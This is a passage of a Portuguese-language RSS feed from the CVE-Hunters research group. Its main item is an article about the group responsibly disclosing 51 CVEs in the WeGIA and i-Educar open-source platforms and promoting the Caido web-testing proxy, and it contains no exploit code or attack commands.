    &amp;lt;li&amp;gt;Danos à reputação: Expor dados de clientes ou informações comerciais pode prejudicar significativamente a Imagem da organização.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execução de ataques em cadeia: As informações obtidas podem ser usadas para realizar novos ataques, como phishing direcionado ou ataques a sistemas interconectados.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 19 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Descoberta de 51 CVEs - Como o Caido Ajudou Nossa Pesquisa em Segurança de Código Aberto</title>
        <link>https://www.cvehunters.com/pt/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/</link>
        <guid>https://www.cvehunters.com/pt/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/</guid>
        <description>&amp;lt;h2 id=&amp;#34;contribuições-do-grupo-cve-hunters-usando-o-caido&amp;#34;&amp;gt;Contribuições do Grupo CVE-Hunters usando o Caido
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A segurança da informação é uma ajuda preciosa para o design, instalação e atualização contínua de sistemas computacionais, especialmente para uso público, sem fins lucrativos ou educacional. Com o aumento dos ataques cibernéticos e vazamentos de dados, nunca foi tão crítico melhorar a segurança dos projetos open source.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Nosso grupo, CVE-Hunters, se esforça para encontrar, pesquisar e divulgar de forma responsável vulnerabilidades (CVEs) em softwares de código aberto amplamente utilizados. Contribuímos com a comunidade global de cibersegurança relatando CVEs, melhorando a segurança do código e ajudando os mantenedores a corrigirem vulnerabilidades de segurança do mundo real antes que se tornem alvos de ataques.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;contribuições-do-grupo-cve-hunters-usando-o-caido&amp;#34;&amp;gt;Contribuições do Grupo CVE-Hunters usando o Caido
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A segurança da informação é uma ajuda preciosa para o design, instalação e atualização contínua de sistemas computacionais, especialmente para uso público, sem fins lucrativos ou educacional. Com o aumento dos ataques cibernéticos e vazamentos de dados, nunca foi tão crítico melhorar a segurança dos projetos open source.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Nosso grupo, CVE-Hunters, se esforça para encontrar, pesquisar e divulgar de forma responsável vulnerabilidades (CVEs) em softwares de código aberto amplamente utilizados. Contribuímos com a comunidade global de cibersegurança relatando CVEs, melhorando a segurança do código e ajudando os mantenedores a corrigirem vulnerabilidades de segurança do mundo real antes que se tornem alvos de ataques.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Por meio de pesquisas de vulnerabilidade no trabalho e testes de penetração ao vivo, nosso programa não apenas protege aplicações web críticas, mas também oferece treinamento prático para a futura geração de hackers éticos e especialistas em cibersegurança. Buscamos fomentar uma cultura de cibersegurança ativa, aberta e inclusiva — permitindo que estudantes e pesquisadores utilizem ferramentas de ponta como o Caido para realizar ataques simulados, automatizar testes de segurança e facilitar práticas de desenvolvimento seguro.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;objetivos-do-projeto&amp;#34;&amp;gt;Objetivos do Projeto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Nossa pesquisa em cibersegurança se apoia em três pilares centrais que sustentam a excelência técnica e a responsabilidade social:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
 &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;Reforçar a segurança de softwares open source comumente utilizados por meio da descoberta, verificação e apoio à correção de vulnerabilidades do mundo real. Esses bugs centrais — como Cross-Site Scripting (XSS), Insecure Direct Object References (IDOR) ou autenticação falha — podem ser explorados em produção, expondo informações sensíveis.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Oferecer treinamento experiencial em cibersegurança para futuros profissionais por meio de projetos reais de avaliação de vulnerabilidades. Os estudantes ganham experiência prática em descoberta de bugs, análise de código seguro e divulgação ética de vulnerabilidades usando ferramentas modernas como Caido, Burp Suite e scripts de automação personalizados.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Incentivar a pesquisa colaborativa e a publicação responsável de CVEs (Common Vulnerabilities and Exposures) para facilitar a conscientização sobre ameaças emergentes, melhorar a transparência e ajudar no fortalecimento contínuo de sistemas críticos.&amp;lt;/li&amp;gt;
 &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;case-1-platforma-wegia&amp;#34;&amp;gt;Case 1: Platforma WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia.png&amp;#34;
	width=&amp;#34;1914&amp;#34;
	height=&amp;#34;959&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_2524eec9eeae804c.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_91fc3ba8afe4f7ad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;199&amp;#34;
		data-flex-basis=&amp;#34;478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um dos principais alvos de nossa pesquisa em segurança foi a aplicação web WeGIA (Web Manager for Assistance Institutions) — uma aplicação open source para gerenciamento de instituições do terceiro setor no Brasil, incluindo ONGs, abrigos sociais e instituições sem fins lucrativos. Tais organizações dependem fortemente de doações, apoio voluntário e processamento seguro de dados para funcionar de forma eficaz.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;As falhas de segurança descobertas incluíram vulnerabilidades críticas como acesso não autorizado, processos de autenticação inadequados e exposição de dados com impacto considerável na confidencialidade, integridade e disponibilidade de informações sensíveis. Em um desafio colaborativo fascinante de pentest, a comunidade CVE-Hunters descobriu, divulgou de forma responsável e reavaliou 48 vulnerabilidades (CVEs) no sistema WeGIA.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A correção eficaz e a descoberta dessas falhas contribuíram para o status geral de segurança da plataforma e facilitaram a sustentabilidade e confiabilidade do software a longo prazo. Este caso reforça a necessidade de escaneamento constante de vulnerabilidades e a presença do hacking ético na defesa de ferramentas open source utilizadas em contextos sociais críticos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;case-2-platforma-i-educar&amp;#34;&amp;gt;Case 2: Platforma i-Educar
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar.png&amp;#34;
	width=&amp;#34;1914&amp;#34;
	height=&amp;#34;962&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_4322185b1b88d839.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_1cac18ecedf8c1b3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;477px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Dando continuidade ao nosso esforço para promover a segurança cibernética da infraestrutura digital crítica, nossa equipe de pesquisa direcionou seu foco para a plataforma i-Educar, um sistema de gestão escolar open source amplamente adotado por escolas públicas e instituições de ensino no Brasil.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O i-Educar é projetado para lidar com dados sensíveis de estudantes, incluindo informações pessoais dos alunos, professores e históricos escolares. Isso torna a plataforma um alvo privilegiado para possíveis atacantes, o que reforça a importância de protegê-la contra ameaças futuras.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Durante uma auditoria profissional de segurança de aplicações, nossa equipe de pesquisadores encontrou outras vulnerabilidades no sistema i-Educar. Estas incluíam bypass de autenticação, exposição insegura de dados e controles de acesso inadequados — que podem comprometer a confidencialidade, integridade e disponibilidade das informações educacionais.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Até o momento, 3 das vulnerabilidades receberam oficialmente IDs de CVE e foram divulgadas de forma responsável aos mantenedores do projeto seguindo as melhores práticas de divulgação coordenada. As demais descobertas estão aguardando validação técnica e documentação e serão submetidas para publicação como CVE nas próximas semanas.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este estudo de caso ilustra a importância da pesquisa de vulnerabilidades para a comunidade educacional, especialmente ao lidar com plataformas open source que armazenam informações pessoais identificáveis (PII). Ao proteger o i-Educar, estamos comprometidos em construir uma comunidade online mais segura para escolas e estudantes.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;ferramenta-de-suporte-caido&amp;#34;&amp;gt;Ferramenta de Suporte: Caido
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido.webp&amp;#34;
	width=&amp;#34;2600&amp;#34;
	height=&amp;#34;1417&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_9c404777f95c89b8.webp 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_352aa15174226705.webp 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;440px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em nossos testes aprofundados de segurança de aplicações web, o Caido tem sido uma de nossas ferramentas preferidas para descobrir, explorar e documentar vulnerabilidades. Criado para pentesters, pesquisadores de segurança e caçadores de bugs, o Caido é uma alternativa moderna e leve ao Burp Suite, com uma interface amigável sem perder funcionalidades.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Com funcionalidades voltadas para hacking ético e pentests em aplicações web, o Caido permite fluxos de trabalho eficientes tanto em ambientes manuais quanto semi-automatizados. A capacidade do Caido de interceptar tráfego, mapear a estrutura de sites e gerenciar grandes volumes de requisições HTTP o qualifica para identificar problemas como XSS, CSRF, IDOR, falhas de autenticação e gerenciamento inseguro de sessões.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Além de sua interface limpa e fluidez, o design do Caido é escalável — tornando-o uma das melhores ferramentas para profissionais de segurança que buscam um scanner e ferramenta de exploração de vulnerabilidades web em nível corporativo para uso em cenários reais. Seja para testar o OWASP Top 10 ou realizar auditorias técnicas profundas, o Caido é um componente essencial do kit de ferramentas de segurança ofensiva no mundo moderno.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;interface-simples-e-funcional&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Interface simples e funcional&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface.png&amp;#34;
	width=&amp;#34;974&amp;#34;
	height=&amp;#34;738&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_946c678debb29535.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_5a3572f402be32ad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;316px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O Caido possui uma interface minimalista, moderna e amigável, projetada para facilitar o processo de pentest em aplicações web. Recursos úteis como mapa dinâmico do site, histórico completo de navegação e interceptação em tempo real do tráfego HTTP permitem que pesquisadores de segurança tenham ampla visibilidade sobre a estrutura e operação da aplicação alvo.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Isso permite identificar vetores de ataque potenciais de forma mais rápida e precisa, fazendo do Caido a solução preferida entre profissionais que buscam uma plataforma fácil de usar e poderosa para exploração de requisições em tempo real, inspeção de parâmetros e detecção de vulnerabilidades. Desde o mapeamento de endpoints complexos até a análise de sessões ao vivo, o Caido otimiza o processo sem comprometer profundidade ou precisão.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;automação-com&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Automação com &amp;amp;ldquo;Automate&amp;amp;rdquo;&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate.png&amp;#34;
	width=&amp;#34;1424&amp;#34;
	height=&amp;#34;627&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_b71d2686d66b9f75.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_1ff1724a47fc979e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;227&amp;#34;
		data-flex-basis=&amp;#34;545px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O recurso &amp;#34;Automate&amp;#34; do Caido permite que profissionais de segurança configurem e executem varreduras de vulnerabilidade personalizadas com precisão e velocidade. É especialmente útil na automação da detecção de vulnerabilidades comuns em aplicações web, como XSS, CSRF, IDOR e falhas de autenticação ou gerenciamento de sessão.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Com suporte para automação de testes com scripts e injeção de payloads personalizados, a funcionalidade Automate do Caido reduz significativamente o trabalho manual, mas aumenta a precisão na identificação de falhas de segurança em ambientes web complexos. É uma adição ideal para pentesters e caçadores de bugs que desejam melhorar seus testes com varreduras automatizadas e eficientes adaptadas ao seu escopo.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;gerenciamento-de-projetos&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Gerenciamento de projetos&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes.png&amp;#34;
	width=&amp;#34;882&amp;#34;
	height=&amp;#34;451&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_3ab3440b6ccc98cc.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_827f3f99ffd7ccda.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O Caido oferece suporte a procedimentos eficientes de pentest com a capacidade de trabalhar em vários projetos simultaneamente sem precisar reiniciar o aplicativo. Esse tipo de funcionalidade é essencial para especialistas que conduzem múltiplos testes de segurança ao mesmo tempo, permitindo alternância fácil entre alvos sem comprometer a integridade das informações.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Para tornar o gerenciamento de campanhas de pentest ainda mais simples, o Caido possui um recurso completo chamado Scopes. Com ele, os usuários podem definir, segmentar e gerenciar escopos de teste múltiplos dentro de um único projeto. Isso é útil para segmentar testes em diferentes domínios, aplicações ou ambientes — melhorando a organização, reduzindo ruídos e apoiando uma análise de vulnerabilidades mais direcionada.&amp;lt;/p&amp;gt; &amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Ao combinar a capacidade de múltiplos projetos com testes limitados por escopo, o Caido mantém pentesters, caçadores de bugs e pesquisadores de segurança produtivos, eficazes e concentrados nos bugs mais importantes.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;By combining multi-project capability with scope-limited testing via environments, Caido keeps penetration testers, bug bounty hunters, and security researchers productive, effective, and concentrated on the most important bugs.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;filtros-com-httpql&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Filtros com HTTPQL&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters.png&amp;#34;
	width=&amp;#34;1324&amp;#34;
	height=&amp;#34;422&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_c24f37b46942eccd.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_b74b8191f7d2bf3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;313&amp;#34;
		data-flex-basis=&amp;#34;752px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O mecanismo de busca HTTPQL do Caido oferece filtragem precisa e exame minucioso de requisições HTTP, mesmo em tráfego web pesado. Como pesquisador de segurança e pentester, essa linguagem de consulta concisa e direta ajuda você a navegar rapidamente por grandes volumes de dados sem precisar ser um programador experiente.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Com o HTTPQL, a filtragem avançada de requisições se torna mais fácil de implementar, acelerando a identificação de falhas de segurança como pontos de injeção, erros de autenticação e irregularidades de sessão, tornando-o uma ferramenta essencial para auditorias automatizadas de tráfego web e testes de vulnerabilidades em larga escala.&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O Caido também se destaca ao oferecer recursos de ponta que o tornam mais forte em cenários reais de pentest e auditoria de segurança:&amp;lt;/p&amp;gt; 
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; 
  &amp;lt;ul&amp;gt; 
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Proxy invisível:&amp;lt;/b&amp;gt; Captura e salva convenientemente o tráfego de rede de clientes e dispositivos que não suportam configuração manual de proxy. Isso é especialmente útil ao testar softwares embarcados, dispositivos IoT, aplicativos móveis e navegadores bloqueados para análises profundas de segurança em casos difíceis de testar.&amp;lt;/li&amp;gt; 
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Substituição de DNS:&amp;lt;/b&amp;gt; Fornece controle refinado sobre a resolução de nomes de domínio durante testes de segurança, permitindo que pentesters falsifiquem DNS, redirecionem tráfego e criem casos de teste realistas. É essencial para verificar vulnerabilidades relacionadas a DNS, realizar ataques de phishing e analisar vetores complexos de ataque em rede.&amp;lt;/li&amp;gt; 
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Integração com navegador:&amp;lt;/b&amp;gt; Facilita a inspeção instantânea e dinâmica do tráfego HTTP/HTTPS de navegadores modernos, incluindo aqueles fortemente baseados em JavaScript e carregamento dinâmico de conteúdo. A integração melhora a eficiência nos testes de aplicações web altamente interativas, aplicações de página única (SPA) e ambientes de cliente rico, permitindo a detecção de XSS, problemas de autenticação e outros ataques client-side.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt; 
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;sobre-o-grupo-cve-hunters-formação-evolução-e-missão&amp;#34;&amp;gt;Sobre o Grupo CVE-Hunters: Formação, Evolução e Missão
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo.png&amp;#34;
	width=&amp;#34;674&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_1766647e601cd925.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_70e520e1660c3d3e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;79&amp;#34;
		data-flex-basis=&amp;#34;190px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O CVE-Hunters é um grupo de pesquisa dedicado à segurança da informação, especializado na descoberta, análise e divulgação responsável de vulnerabilidades em aplicativos de software críticos. Fundado em dezembro de 2024 pelo especialista em segurança cibernética, Professor &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;&amp;gt;Natan Morette&amp;lt;/a&amp;gt;, o grupo começou com apenas quatro alunos apaixonados, ansiosos por aprofundar seus conhecimentos em segurança ofensiva e hacking ético.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Sob a orientação técnica e ética especializada do Professor &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;, o CVE-Hunters cresceu e amadureceu de forma constante. Hoje, contamos com orgulho com 10 pesquisadores ativos em segurança cibernética que aplicam as habilidades práticas aprendidas tanto em ambientes acadêmicos quanto em ambientes de laboratório. Nossas principais áreas de foco incluem testes de penetração, avaliação de vulnerabilidades, publicação de CVE e contribuição para o fortalecimento da segurança de projetos de código aberto impactantes com relevância social significativa.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Nosso trabalho de pesquisa e desenvolvimento está em constante evolução. Estamos analisando ativamente novas falhas de segurança, documentando detalhes técnicos e preparando divulgações de vulnerabilidades responsáveis ​​adicionais para a comunidade.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Para saber mais sobre os membros da nossa equipe, explorar nossos projetos em andamento e acompanhar as últimas publicações do CVE, visite nosso repositório oficial do GitHub em: &amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;lt;/a&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Todas as vulnerabilidades identificadas e CVEs oficialmente publicadas pelo CVE-Hunters são catalogadas de forma transparente e acessíveis em nosso site oficial: &amp;lt;a href=&amp;#34;https://sec-dojo-cyber-house.github.io/&amp;#34;&amp;gt;https://sec-dojo-cyber-house.github.io/&amp;lt;/a&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;escrito-por&amp;#34;&amp;gt;Escrito por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 04 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Arquivos</title>
        <link>https://www.cvehunters.com/pt/archives/</link>
        <guid>https://www.cvehunters.com/pt/archives/</guid>
        <description></description><content:encoded></content:encoded>
        <pubDate>Sun, 06 Mar 2022 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Apoio</title>
        <link>https://www.cvehunters.com/pt/support/</link>
